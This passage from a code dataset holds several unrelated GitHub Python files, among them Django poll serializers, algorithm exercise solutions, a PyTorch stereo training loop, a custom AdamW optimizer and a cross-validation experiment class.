PollSerializer(serializers.ModelSerializer):\n def validate_start_date(self, value):\n if value < timezone.now():\n raise serializers.ValidationError(START_DATE_EARLIER_THAN_NOW)\n\n if self.instance and value != self.instance.start_date:\n raise serializers.ValidationError(START_DATE_CANNOT_BE_CHANGED)\n\n return value\n\n def validate(self, data):\n start_date = data.get('start_date')\n end_date = data.get('end_date')\n\n if start_date is not None and end_date is not None:\n if end_date - start_date < timezone.timedelta(minutes=POLL_MINIMUM_DURATION_MINUTES):\n raise serializers.ValidationError(POLL_MINIMUM_DURATION_ERROR)\n return data\n\n class Meta:\n model = Poll\n exclude = ('users',)\n extra_kwargs = {'questions': {'required': False}}\n depth = 2\n\n\nclass ActivePollSerializer(serializers.ModelSerializer):\n class Meta:\n model = Poll\n exclude = ('users',)\n read_only_fields = ('id', 'name', 'description', 'start_date', 'end_date', 'questions')\n\n\nclass QuestionSerializer(serializers.ModelSerializer):\n type = ChoicesField(choices=Question.TYPE_CHOICES)\n\n def validate(self, data):\n answers = data.get('answers')\n question_type = data.get('type')\n\n if answers and question_type == Question.TYPE_TEXT and len(answers) > 0:\n raise serializers.ValidationError(CANNOT_CREATE_ANSWER)\n return data\n\n class Meta:\n model = Question\n fields = '__all__'\n extra_kwargs = {'answers': {'required': False}}\n depth = 1\n\n\nclass AnswerSerializer(serializers.ModelSerializer):\n class Meta:\n model = Answer\n fields = '__all__'\n\n\nclass UserPollSerializer(serializers.ModelSerializer):\n class Meta:\n model = UserPoll\n fields = '__all__'\n\n\nclass UserAnswerSerializer(serializers.ModelSerializer):\n def validate_question(self, value):\n if self.instance and value != self.instance.question:\n raise serializers.ValidationError(QUESTION_CANNOT_BE_CHANGED)\n return value\n\n def validate_user_poll(self, value):\n if self.instance and value != self.instance.user_poll:\n raise serializers.ValidationError(USER_POLL_CANNOT_BE_CHANGED)\n return value\n\n def validate(self, data):\n question = data.get('question')\n user_poll = data.get('user_poll')\n answer = data.get('answer')\n request = self.context.get(\"request\")\n\n if question and user_poll:\n if question not in user_poll.poll.questions.all():\n raise serializers.ValidationError(WRONG_QUESTION_ID)\n\n if question and answer:\n if question.type != Question.TYPE_TEXT and \\\n answer not in question.answers.all().values_list('text', flat=True):\n raise serializers.ValidationError(ANSWER_NOT_ALLOWED)\n\n if request.method == 'POST' and question and user_poll and question.type != Question.TYPE_MULTIPLE:\n if UserAnswer.objects.filter(question=question, user_poll=user_poll).exists():\n raise serializers.ValidationError(CANNOT_CREATE_MULTIPLE_ANSWERS)\n\n if user_poll:\n if request.user != user_poll.user and request.session.session_key != user_poll.session_key:\n raise serializers.ValidationError(CANNOT_ANSWER_FOR_ANOTHER_USER)\n return data\n\n class Meta:\n model = UserAnswer\n fields = '__all__'\n\n\nclass UserPollEntrySerializer(serializers.ModelSerializer):\n poll = PollSerializer()\n answers = serializers.SerializerMethodField('get_answers')\n\n def get_answers(self, obj):\n answers = UserAnswer.objects.filter(user_poll=self.instance)\n return UserAnswerSerializer(answers, many=True).data\n\n class Meta:\n model = UserPoll\n exclude = ('user', 'session_key')\n","repo_name":"Kononkov1998/Polls","sub_path":"polls/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":4470,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"73276992905","text":"# 18258번 큐 2\r\nfrom collections import deque\r\nimport sys\r\n\r\ninput = sys.stdin.readline\r\n\r\nn = int(input())\r\nqueue = deque([])\r\nfor _ in range(n):\r\n order = input().rstrip().split()\r\n haveToDo = order[0]\r\n\r\n if haveToDo == \"push\":\r\n queue.append(order[1])\r\n elif haveToDo == \"pop\":\r\n if queue:\r\n print(queue.popleft())\r\n else:\r\n print(-1)\r\n elif haveToDo == \"size\":\r\n print(len(queue))\r\n\r\n elif haveToDo == \"empty\":\r\n if queue:\r\n print(0)\r\n else:\r\n print(1)\r\n elif haveToDo == \"front\":\r\n if queue:\r\n print(queue[0])\r\n else:\r\n print(-1)\r\n elif haveToDo == \"back\":\r\n if queue:\r\n print(queue[-1])\r\n else:\r\n print(-1)\r\n","repo_name":"glaxyt/bojSolv","sub_path":"18258.py","file_name":"18258.py","file_ext":"py","file_size_in_byte":799,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"16558929329","text":"import torch\nimport os\nimport time\nimport torch.nn as nn\nimport torch.optim as optim\nimport torch.nn.functional as F\nfrom datasets.messytable import MessytableDataset\nfrom Models import get_model\nfrom Losses import get_losses\nfrom Metrics.metrics import epe_metric\nfrom Metrics.metrics import tripe_metric\nfrom tensorboardX import SummaryWriter\nfrom utils.util import *\nimport pdb\n\nclass TrainSolver(object):\n\n def __init__(self, args, config):\n\n self.config = config\n self.args = args\n\n\n self.max_disp = self.config.ARGS.MAX_DISP\n self.loss_name = \"XTLoss\"\n\n train_dataset = MessytableDataset(config.SPLIT.TRAIN, gaussian_blur=False, color_jitter=False, debug=args.debug, sub=600)\n val_dataset = MessytableDataset(config.SPLIT.VAL, gaussian_blur=False, color_jitter=False, debug=args.debug, sub=100, isVal=True)\n\n self.TrainImgLoader = torch.utils.data.DataLoader(train_dataset, batch_size=config.SOLVER.BATCH_SIZE,\n shuffle=True, num_workers=config.SOLVER.NUM_WORKER, drop_last=True)\n\n self.ValImgLoader = torch.utils.data.DataLoader(val_dataset, batch_size=config.SOLVER.BATCH_SIZE,\n shuffle=False, num_workers=config.SOLVER.NUM_WORKER, drop_last=False)\n\n\n self.model = get_model(self.config)\n\n self.crit = get_losses(self.loss_name, max_disp=self.max_disp)\n\n self.optimizer = optim.Adam(self.model.parameters(), lr=self.config.SOLVER.LR_CASCADE)\n\n self.scheduler = optim.lr_scheduler.MultiStepLR(self.optimizer, milestones=[2,3,4], gamma=0.5)\n\n self.writer = SummaryWriter(args.logdir)\n\n self.global_step = 0\n self.epoch = 0\n self.best_epe = 9999999999\n\n def save_checkpoint(self, best=False):\n\n ckpt_root = os.path.join(self.args.logdir, 'checkpoints')\n\n if not os.path.exists(ckpt_root):\n os.makedirs(ckpt_root) \n \n ckpt_name = 'ep_{:d}.pth'.format(self.epoch)\n\n if best:\n ckpt_name = 'best_epe_{:f}.pth'.format(self.best_epe)\n\n states = {\n 'epoch': self.epoch,\n 'best_epe': self.best_epe,\n 'global_step': self.global_step,\n 'model_state': self.model.state_dict(),\n 'optimizer_state': self.optimizer.state_dict(),\n 'scheduler_state': self.scheduler.state_dict()\n }\n ckpt_full = os.path.join(ckpt_root, ckpt_name)\n \n torch.save(states, ckpt_full)\n \n def load_checkpoint(self):\n\n ckpt_root = os.path.join(self.args.loadmodel)\n\n states = torch.load(ckpt_full, map_location=lambda storage, loc: storage)\n\n self.epoch = states['epoch']\n self.best_epe = states['best_epe']\n self.global_step = states['global_step']\n self.model.load_state_dict(states['model_state'])\n self.optimizer.load_state_dict(states['optimizer_state'])\n self.scheduler.load_state_dict(states['scheduler_state'])\n\n def run(self):\n self.model = nn.DataParallel(self.model)\n self.model.cuda()\n \n print('Number of model parameters: {}'.format(sum([p.data.nelement() for p in self.model.parameters()])))\n\n if self.args.loadmodel:\n self.load_checkpoint()\n print('[{:d}] Model loaded.'.format(self.args.loadmodel))\n \n for epoch in range(self.config.SOLVER.EPOCHS):\n self.model.train()\n self.epoch = epoch\n for i, data_batch in enumerate(self.TrainImgLoader):\n start_time = time.time()\n \n self.model.train()\n imgL, imgR, disp_L = data_batch['img_sim_L'], data_batch['img_sim_R'], data_batch['img_disp_l']\n imgL, imgR, disp_L = imgL.cuda(), imgR.cuda(), disp_L.cuda()\n\n disp_L = F.interpolate(disp_L, scale_factor=0.5, mode='nearest',\n recompute_scale_factor=False) # [bs, 1, H, W]\n \n self.optimizer.zero_grad()\n #pdb.set_trace()\n disp_pred_left = self.model(imgL, imgR)\n \n #pdb.set_trace()\n\n loss = self.crit(imgL, imgR, disp_pred_left)\n loss.backward()\n self.optimizer.step()\n \n elapsed = time.time() - start_time\n #print(disp_L.shape, disp_pred_left.shape)\n train_EPE_left = epe_metric(disp_L, disp_pred_left, self.max_disp)\n train_3PE_left = tripe_metric(disp_L, disp_pred_left, self.max_disp)\n\n \n print(\n 'Epoch[{:d}/{:d}] iter[{:d}/{:d}] Train Loss = {:.6f}, EPE = {:.3f} px, 3PE = {:.3f}%, time = {:.3f}s.'.format(\n self.epoch, self.config.SOLVER.EPOCHS,\n i, len(self.TrainImgLoader),\n loss.item(),\n train_EPE_left, \n train_3PE_left * 100,\n elapsed\n )\n )\n #print(imgL.shape, disp_pred_left.shape, disp_L.shape)\n if self.global_step % self.args.summary_freq == 0:\n scalar_output = {'reproj_loss': loss.item(), 'EPE': train_EPE_left, 'bad3': train_3PE_left}\n save_scalars(self.writer, 'train', scalar_output, self.global_step)\n\n save_images(self.writer, 'train', {'img_L':[imgL.detach().cpu()]}, self.global_step) \n save_images(self.writer, 'train', {'img_R':[imgR.detach().cpu()]}, self.global_step)\n save_images(self.writer, 'train', {'disp_gt':[disp_L.detach().cpu()]}, self.global_step) \n save_images(self.writer, 'train', {'disp_pred':[disp_pred_left.detach().cpu()]}, self.global_step)\n\n self.global_step += 1\n\n self.scheduler.step()\n\n start_time = time.time()\n self.model.eval()\n with torch.no_grad():\n \n val_EPE_metric_left = 0.0\n val_TriPE_metric_left = 0.0\n N_total = 0.0\n \n for i, val_batch in enumerate(self.ValImgLoader):\n imgL, imgR, disp_L = val_batch['img_sim_L'], val_batch['img_sim_R'], val_batch['img_disp_l']\n imgL, imgR, disp_L = imgL.cuda(), imgR.cuda(), disp_L.cuda()\n \n disp_L = F.interpolate(disp_L, scale_factor=0.5, mode='nearest',\n recompute_scale_factor=False) # [bs, 1, H, W]\n\n N_curr = imgL.shape[0]\n \n #print(imgL.shape, imgR.shape)\n disp_pred_left = self.model(imgL, imgR)\n \n val_EPE_metric_left += epe_metric(disp_L, disp_pred_left, self.max_disp) * N_curr \n val_TriPE_metric_left += tripe_metric(disp_L, disp_pred_left, self.max_disp) * N_curr\n\n N_total += N_curr\n\n scalar_output = {'reproj_loss': loss.item(), 'EPE': train_EPE_left, 'bad3': train_3PE_left}\n save_scalars(self.writer, 'validation', scalar_output, self.global_step)\n\n save_images(self.writer, 'validation', {'img_L':[imgL.detach().cpu()]}, self.global_step) \n save_images(self.writer, 'validation', {'img_R':[imgR.detach().cpu()]}, self.global_step)\n save_images(self.writer, 'validation', {'disp_gt':[disp_L.detach().cpu()]}, self.global_step) \n save_images(self.writer, 'validation', {'disp_pred':[disp_pred_left.detach().cpu()]}, self.global_step)\n \n val_EPE_metric_left /= N_total\n val_TriPE_metric_left /= N_total\n \n\n elapsed = time.time() - start_time\n print(\n 'Epoch:[{:d}/{:d}] Validation : EPE = {:.6f} px, 3PE = {:.3f} %, time = {:.3f} s.'.format(\n self.epoch, self.config.SOLVER.EPOCHS,\n val_EPE_metric_left, \n val_TriPE_metric_left * 100, \n elapsed / N_total\n )\n )\n\n self.save_checkpoint()\n print('')\n print('Epoch[{:d}] Model saved.'.format(self.epoch))\n\n if val_EPE_metric_left < self.best_epe:\n self.best_epe = val_EPE_metric_left\n self.save_checkpoint(best=True)\n print('')\n print('Best Epoch[{:d}] Model saved.'.format(self.epoch))\n \n\n\n\n","repo_name":"VictorTao1998/ActiveStereo","sub_path":"Sovlers/solver_train.py","file_name":"solver_train.py","file_ext":"py","file_size_in_byte":8774,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"14022097846","text":"import sqlite3 as sq\nfrom create_bot import bot\n\n\ndef sql_start():\n global base, cur\n base = sq.connect('keys_base.db')\n cur = base.cursor()\n if base:\n print('Data base connected OK')\n base.execute('CREATE TABLE IF NOT EXISTS search_keys (id TEXT PRIMARY KEY, keys TEXT)')\n base.commit()\n\n\nasync def sql_add_command(user_id, key, message):\n if cur.execute('SELECT keys FROM search_keys WHERE id == ?', (str(user_id),)).fetchone() is None:\n cur.execute('INSERT INTO search_keys VALUES (?, ?)', (user_id, key))\n base.commit()\n else:\n await bot.send_message(message.from_user.id, 'Ключи уже занесены')\n\n\nasync def my_keys(user_id, message):\n try:\n text = ''.join(cur.execute('SELECT keys FROM search_keys WHERE id == ?', (str(user_id),)).fetchone())\n await bot.send_message(message.from_user.id, text)\n except:\n await bot.send_message(message.from_user.id, 'Сначала внеси ключи')\n\n\nasync def change_keys(id, keys):\n cur.execute('UPDATE search_keys SET keys == ? WHERE id == ?', (str(keys), id))\n base.commit()\n","repo_name":"EgorYakunin/hrc_parser","sub_path":"data_base/sqlite_db.py","file_name":"sqlite_db.py","file_ext":"py","file_size_in_byte":1125,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"73056953864","text":"import setuptools\n\nwith open(\"README.md\", \"r\") as fh:\n long_description = fh.read()\n\n\nsetuptools.setup(\n # Project\n name=\"dragn\",\n version=\"0.4.0\",\n description=\"A library to emulate rolling dice\",\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n url=\"https://github.com/lurst/dragn\",\n classifiers=[\n \"Development Status :: 4 - Beta\",\n \"Intended Audience :: Developers\",\n \"License :: OSI Approved :: MIT License\",\n \"Operating System :: OS Independent\",\n \"Programming Language :: Python\",\n \"Programming Language :: Python :: 3.7\",\n \"Programming Language :: Python :: 3 :: Only\",\n ],\n # Author\n author=\"Gil Goncalves\",\n author_email=\"lursty@gmail.com\",\n # Code\n packages=setuptools.find_packages(),\n)\n","repo_name":"LuRsT/dragn","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":829,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"81"} +{"seq_id":"7923832959","text":"from tastypie_mongoengine import resources\nfrom tastypie.authorization import Authorization\nfrom tastypie.cache import SimpleCache\n\nfrom models import SignUp\n\nclass SignUpResource(resources.MongoEngineResource):\n class Meta:\n app_label = \"test\"\n queryset = SignUp.objects.all()\n allowed_methods = ('get','post')\n authorization = Authorization()\n filtering = {\n 'location': resources.QUERY_TERMS_ALL\n }\n cache = SimpleCache()\n \n def dehydrate_email(self, bundle):\n return None\n \n def dehydrate_name(self, bundle):\n return None\n \n def build_filters(self, filters=None):\n if filters is None:\n filters = {}\n \n orm_filters = super(SignUpResource, self).build_filters(filters)\n \n if \"within_distance\" in filters:\n points = filters['within_distance'].split(',')\n points = map(float, points)\n distance = [\n (points[0],points[1]),\n 5\n ]\n \n orm_filters[\"location__within_distance\"] = distance\n \n return orm_filters\n ","repo_name":"eddowding/signmeup","sub_path":"server/signups/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":1173,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"21939714724","text":"from pathlib import Path\nimport pandas\nimport json\n\n\ndef excel_json():\n try:\n path = Path(__file__).parent.parent/\"Excel/test.xlsx\"\n\n #reading suite sheet\n suite = pandas.read_excel(path, sheet_name='Suite')\n module = suite.to_json(orient='records')\n\n #reading testcases sheet\n testcase = pandas.read_excel(path, sheet_name='TestsCases')\n tests = testcase.to_json(orient='records')\n\n test_json = json.loads(tests)\n module_json = json.loads(module)\n\n test_json\n size = len(test_json)\n global testName\n for i in range(0,size):\n name = test_json[i]['ModuleName']\n if(name is not None):\n testName = name\n else:\n test_json[i]['ModuleName'] = testName\n\n response = {\"modules\": module_json, \"tests\": test_json}\n except:\n response = {}\n return response\n\ndef runnable_test():\n try:\n json = excel_json()\n global runnableModules\n runnableModules= []\n runnableTests = {}\n if(len(json) > 0):\n vars = {}\n modules = json['modules']\n tests = json[\"tests\"]\n for i in range(0,len(modules)):\n module_name = modules[i]['ModuleName']\n flag = modules[i]['toBeRun']\n if flag == 'Y':\n runnableModules.append(module_name)\n\n for j in range(0, len(runnableModules)):\n runModule = runnableModules[j]\n for k in range(0,len(tests)):\n runTestModule = tests[k]['ModuleName']\n runTestCase = tests[k]['TestCaseName']\n toBeRun = tests[k]['toBeRun']\n if runTestModule == runModule and toBeRun == 'Y':\n runnableTests[runTestCase] = tests[k]\n return runnableTests\n except:\n return runnableTests\n\n\n\n","repo_name":"santhosh-alluri/pythonTestProject","sub_path":"Lib/ExcelUtility.py","file_name":"ExcelUtility.py","file_ext":"py","file_size_in_byte":1944,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"69963980745","text":"\"\"\"\nCommon functions for styling notebooks \npublished as reports.\n\"\"\"\nimport pandas as pd\nimport pandas.io.formats.style # to add type hint (https://github.com/pandas-dev/pandas/issues/24884)\n\nfrom IPython.display import HTML\n\n'''\nWorking example:\nhttps://github.com/CityOfLosAngeles/planning-entitlements/blob/master/notebooks/D1-entitlement-demographics.ipynb\n\n# Currency: https://stackoverflow.com/questions/35019156/pandas-format-column-as-currency\n'''\n \n# Display a table of route-level stats for each route_group\n# Displaying route_name makes chart too crowded \ndef style_route_stats(df):\n df = df.assign(\n route_short_name = df.apply(\n lambda x: x.route_long_name if x.route_short_name is None\n else x.route_short_name, axis=1)\n )\n \n # Rename columns for display\n rename_cols = {\n \"route_id2\": \"Route ID\",\n \"route_short_name\": \"Route Name\",\n \"route_group\": \"Route Group\",\n \"num_trips\": \"# trips\",\n \"daily_avg_freq\": \"Daily Avg Freq (trips per hr)\",\n \"pm_peak_freq\": \"PM Peak Avg Freq (trips per hr)\",\n \"percentiles\": \"25th, 50th, 75th ptile (hrs)\",\n \"mean_speed_mph\": \"Avg Daily Speed (mph)\",\n }\n \n # Style it\n drop_cols = [\n \"calitp_itp_id\", \"route_id\", \"route_group\", \n \"pct_trips_competitive\",\n \"p25\", \"p50\", \"p75\",\n \"category\"\n ]\n \n # Change alignment for some columns\n # https://stackoverflow.com/questions/59453091/left-align-the-first-column-and-center-align-the-other-columns-in-a-pandas-table\n df_style = (df.sort_values(\n [\"pct_trips_competitive\", \"route_id2\"], \n ascending=[False , True])\n .drop(columns = drop_cols)\n .rename(columns = rename_cols)\n .style.format(\n subset=['Daily Avg Freq (trips per hr)', \n 'PM Peak Avg Freq (trips per hr)', \n 'Avg Daily Speed (mph)', \n ], \n **{'formatter': '{:,.3}'})\n .set_properties(subset=['Route ID', 'Route Name'], \n **{'text-align': 'left'})\n .set_properties(subset=['# trips', 'Daily Avg Freq (trips per hr)', \n 'PM Peak Avg Freq (trips per hr)', \n 'Avg Daily Speed (mph)',\n ], \n **{'text-align': 'center'})\n .set_table_styles([dict(selector='th', \n props=[('text-align', 'center')])\n ])\n .hide(axis=\"index\")\n .to_html()\n )\n \n display(HTML(\"

Route Stats

\"))\n display(HTML(df_style))","repo_name":"cal-itp/data-analyses","sub_path":"bus_service_increase/bus_service_utils/report_utils.py","file_name":"report_utils.py","file_ext":"py","file_size_in_byte":2790,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"81"} +{"seq_id":"30537484734","text":"from typing import (\n List,\n)\nfrom lintcode import (\n Interval,\n)\n\n\"\"\"\nDefinition of Interval:\nclass Interval(object):\n def __init__(self, start, end):\n self.start = start\n self.end = end\n\"\"\"\n\nclass Solution:\n \"\"\"\n @param intervals: an array of meeting time intervals\n @return: the minimum number of conference rooms required\n \"\"\"\n def min_meeting_rooms(self, intervals: List[Interval]) -> int:\n # Write your code here\n\n start = sorted([t.start for t in intervals])\n end = sorted([t.end for t in intervals])\n\n res, count = 0, 0\n e, s = 0, 0\n\n while s < len(intervals):\n if start[s] < end[e]:\n s += 1\n count += 1\n else:\n count -= 1\n e += 1\n res = max(res, count)\n return res\n","repo_name":"AjayKrP/GoogleInterview","sub_path":"DS_Practice/meeting_room_ii.py","file_name":"meeting_room_ii.py","file_ext":"py","file_size_in_byte":854,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"9941281761","text":"# Learner: 王振强\n# Learn Time: 2022/2/15 17:42\nimport torch.nn as nn\nimport math\nimport torch\nfrom torch.optim.optimizer import Optimizer\n\n\nclass AdamW(Optimizer):\n\n def __init__(self, params, lr=1e-3, betas=(0.9, 0.999), eps=1e-8, weight_decay=0, warmup=0):\n if not 0.0 <= lr:\n raise ValueError(\"Invalid learning rate: {}\".format(lr))\n if not 0.0 <= eps:\n raise ValueError(\"Invalid epsilon value: {}\".format(eps))\n if not 0.0 <= betas[0] < 1.0:\n raise ValueError(\"Invalid beta parameter at index 0: {}\".format(betas[0]))\n if not 0.0 <= betas[1] < 1.0:\n raise ValueError(\"Invalid beta parameter at index 1: {}\".format(betas[1]))\n\n defaults = dict(lr=lr, betas=betas, eps=eps,\n weight_decay=weight_decay, warmup=warmup)\n super(AdamW, self).__init__(params, defaults)\n\n def __setstate__(self, state):\n super(AdamW, self).__setstate__(state)\n\n def step(self, closure=None):\n loss = None\n if closure is not None:\n loss = closure()\n\n for group in self.param_groups:\n\n for p in group['params']:\n if p.grad is None:\n continue\n grad = p.grad.data.float()\n if grad.is_sparse:\n raise RuntimeError('Adam does not support sparse gradients, please consider SparseAdam instead')\n\n p_data_fp32 = p.data.float()\n\n state = self.state[p]\n\n if len(state) == 0:\n state['step'] = 0\n state['exp_avg'] = torch.zeros_like(p_data_fp32)\n state['exp_avg_sq'] = torch.zeros_like(p_data_fp32)\n else:\n state['exp_avg'] = state['exp_avg'].type_as(p_data_fp32)\n state['exp_avg_sq'] = state['exp_avg_sq'].type_as(p_data_fp32)\n\n exp_avg, exp_avg_sq = state['exp_avg'], state['exp_avg_sq']\n beta1, beta2 = group['betas']\n\n state['step'] += 1\n\n exp_avg_sq.mul_(beta2).addcmul_(1 - beta2, grad, grad)\n exp_avg.mul_(beta1).add_(1 - beta1, grad)\n\n denom = exp_avg_sq.sqrt().add_(group['eps'])\n bias_correction1 = 1 - beta1 ** state['step']\n bias_correction2 = 1 - beta2 ** state['step']\n\n if group['warmup'] > state['step']:\n scheduled_lr = 1e-8 + state['step'] * group['lr'] / group['warmup']\n else:\n scheduled_lr = group['lr']\n\n step_size = scheduled_lr * math.sqrt(bias_correction2) / bias_correction1\n\n if group['weight_decay'] != 0:\n p_data_fp32.add_(-group['weight_decay'] * scheduled_lr, p_data_fp32)\n\n p_data_fp32.addcdiv_(-step_size, exp_avg, denom)\n\n p.data.copy_(p_data_fp32)\n\n return loss\n\n\n\n\n\n\n\n","repo_name":"xiaoxiaokuaile/2022DCIC_OCR","sub_path":"MultiLabelSoftMargin_model/utils/optimizer/adamw.py","file_name":"adamw.py","file_ext":"py","file_size_in_byte":2953,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"81"} +{"seq_id":"19665314427","text":"from typing import Tuple\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\n__all__ = [\"Projector\", \"Bias\", \"PositiveReal\"]\n\n\nclass Projector(nn.Module):\n def __init__(\n self,\n in_dim,\n out_dim,\n normalized=True,\n norm_type=2.0,\n weight=None,\n channel_last=False,\n ):\n super().__init__()\n if weight is None:\n weight = torch.randn(out_dim, in_dim)\n else:\n weight = weight.cpu()\n assert weight.size() == (out_dim, in_dim)\n self.weight = nn.Parameter(weight)\n self.in_dim = in_dim\n self.out_dim = out_dim\n self.normalized = normalized\n self.norm_type = norm_type\n self.channel_last = channel_last\n\n def _normalize(self, x):\n return F.normalize(input=x, dim=-1, p=self.norm_type)\n\n def forward(self, inputs):\n\n inputs = self._normalize(inputs)\n projectors = self._normalize(self.weight)\n\n if self.channel_last:\n outputs = torch.einsum(\"...i, oi -> ...o\", inputs, projectors)\n else:\n outputs = torch.einsum(\"bi..., oi -> bo...\", inputs, projectors)\n\n return outputs\n\n def extra_repr(self):\n\n out = []\n out.append(f\"in_dim={self.in_dim}\")\n out.append(f\"out_dim={self.out_dim}\")\n out.append(f\"normalized={self.normalized}\")\n out.append(f\"norm_type={self.norm_type}\")\n\n return \", \".join(out)\n\n\nclass Bias(nn.Module):\n def __init__(self, dims: Tuple[int], nonlinear: nn.Module = nn.Tanh):\n super().__init__()\n self.dims = dims\n self._bias = nn.Parameter(torch.zeros(dims))\n self.nonlinear = nonlinear()\n\n def forward(self):\n return self.nonlinear(self._bias)\n\n def extra_repr(self):\n\n out = []\n out.append(f\"dims={self.dims}\")\n out.append(f\"nonlinear={self.nonlinear.__class__.__name__}\")\n\n return \", \".join(out)\n\n\nclass PositiveReal(nn.Module):\n def __init__(self, initial_value=1.0):\n super().__init__()\n self._log_value = nn.Parameter(torch.tensor(initial_value).log())\n\n def forward(self):\n return self._log_value.exp()\n","repo_name":"chenchao-clarifai/segmentation-experiment","sub_path":"src/models/heads.py","file_name":"heads.py","file_ext":"py","file_size_in_byte":2198,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"1281905629","text":"'''\n문제 설명\n두 개의 단어 begin, target과 단어의 집합 words가 있습니다. 아래와 같은 규칙을 이용하여 begin���서 target으로 변환하는 가장 짧은 변환 과정을 찾으려고 합니다.\n\n1. 한 번에 한 개의 알파벳만 바꿀 수 있습니다.\n2. words에 있는 단어로만 변환할 수 있습니다.\n예를 들어 begin이 hit, target가 cog, words가 [hot,dot,dog,lot,log,cog]라면 hit -> hot -> dot -> dog -> cog와 같이 4단계를 거쳐 변환할 수 있습니다.\n\n두 개의 단어 begin, target과 단어의 집합 words가 매개변수로 주어질 때, 최소 몇 단계의 과정을 거쳐 begin을 target으로 변환할 수 있는지 return 하도록 solution 함수를 작성해주세요.\n\n제한사항\n각 단어는 알파벳 소문자로만 이루어져 있습니다.\n각 단어의 길이는 3 이상 10 이하이며 모든 단어의 길이는 같습니다.\nwords에는 3개 이상 50개 이하의 단어가 있으며 중복되는 단어는 없습니다.\nbegin과 target은 같지 않습니다.\n변환할 수 없는 경우에는 0를 return 합니다.\n입출력 예\nbegin\ttarget\twords\treturn\nhit\tcog\t[hot, dot, dog, lot, log, cog]\t4\nhit\tcog\t[hot, dot, dog, lot, log]\t0\n입출력 예 설명\n예제 #1\n문제에 나온 예와 같습니다.\n\n예제 #2\ntarget인 cog는 words 안에 없기 때문에 변환할 수 없습니다.\n'''\nbegin ='hit'\ntarget = 'cog'\nwords = ['hot', 'dot', 'dog', 'lot', 'log', 'cog']\nwords = ['hot', 'dot', 'dog', 'lot', 'log']\n\ndef check(begin, target):\n index = -1\n count = 0\n for i,(b,t) in enumerate(zip(begin,target)):\n if b != t:\n index = i\n count += 1\n if count > 1:\n return -1\n return index\n\ndef search(graph, begin, target, prev):\n temp = []\n for word in graph[begin]:\n if word in prev:\n continue\n elif word == target:\n return 1\n else:\n temp.append(1 + search(graph,word,target,prev+[word]))\n try:\n return min(temp)\n except ValueError:\n return float('inf')\n\ndef solution(begin, target, words):\n graph = {a:[ b for b in words if check(a, b) > -1 ] for a in words}\n graph[begin] = [ word for word in words if check(begin, word) > -1]\n\n answer = search(graph, begin, target, [begin])\n return 0 if answer == float('inf') else answer\n\nsolution(begin, target, words)\n\ngraph\n","repo_name":"LEE010/Algorithm","sub_path":"python3/programmers/BFS_DFS/단어변환.py","file_name":"단어변환.py","file_ext":"py","file_size_in_byte":2419,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"13874185677","text":"import pandas as pd\n\nfrom sklearn.metrics import roc_auc_score\n\nfrom b2s_clf.experiments.experiment import Experiment\nfrom b2s_clf.utils import data_frame_utils as df_utils\n\n\nclass StratifiedCrossValidationExperiment(Experiment):\n \"\"\"\n A class that calls parent class Experiment to run a stratified cross-validation (SCV) experiment.The class works by\n reading a bunch of information stored in different dictionaries. Refer to /json_examples and library b2s_clf/apps/\n for specific information and templates on these dictionaries.\n \"\"\"\n\n def __init__(self, df, subject_dictionary, sampler_dictionary, ensemble_dictionary, transformer_dictionary):\n \"\"\"\n Class constructor. Calls parent class and sets additional arguments.\n\n Args:\n df: pandas.DataFrame containing signal data.\n subject_dictionary: Dict with subject data build information.\n sampler_dictionary: Dict with sampling instructions.\n ensemble_dictionary: Dict with ensemble build instructions.\n transformer_dictionary: Dict with data set transformation build\n \"\"\"\n super().__init__(df, subject_dictionary, sampler_dictionary, ensemble_dictionary, transformer_dictionary)\n self.experiment_type = \"STRATIFIED CV\"\n self.performance_method = \"_compute_scv_performance\"\n self.dataframe_method = \"_get_scv_data_frame\"\n\n def run(self, strata_variable, balanced_by, verbose=False):\n \"\"\"\n Calls b2s_clf.experiments.Experiment._run() with specific SCV parameters.\n\n Args:\n strata_variable: Strata or discrete variable used to build the SCV batches.\n balanced_by: A second binary variable to balance the SCV batches upon.\n verbose: Whether to print progress on screen.\n\n \"\"\"\n self.cv_dfs = df_utils.generate_leave_one_out_batch(signal_df=self.df, subjects_df=self.subject_df,\n subject_id_column=self.subject_column,\n strata_column=strata_variable,\n balanced_by=balanced_by)\n\n cv_batches = len(self.df[strata_variable].unique())\n self._run(cv_batches=cv_batches, verbose=verbose)\n\n def _compute_scv_performance(self, prd, prd_prb, df_val, df_fit):\n \"\"\"\n Specific way of computing experiment performance metrics.\n\n Args:\n prd: numpy.array with predictions.\n prd_prb: numpy.array with prediction probabilities.\n df_val: pandas.DataFrame with validation set.\n df_fit: pandas.DataFrame with training set.\n\n Returns:\n performance: A list with performance metrics for each iteration of the experiment.\n\n \"\"\"\n acc_score = (prd == df_val[self.target_variable]).mean()\n if len(df_val[self.target_variable].unique()) == 1:\n roc_score = acc_score\n else:\n roc_score = roc_auc_score(df_val[self.target_variable], prd_prb)\n\n performance = [acc_score,\n 1 - (prd[df_val[self.target_variable] == 0] == [0] * len(\n df_val[df_val[self.target_variable] == 0])).mean(),\n 1 - (prd[df_val[self.target_variable] == 1] == [1] * len(\n df_val[df_val[self.target_variable] 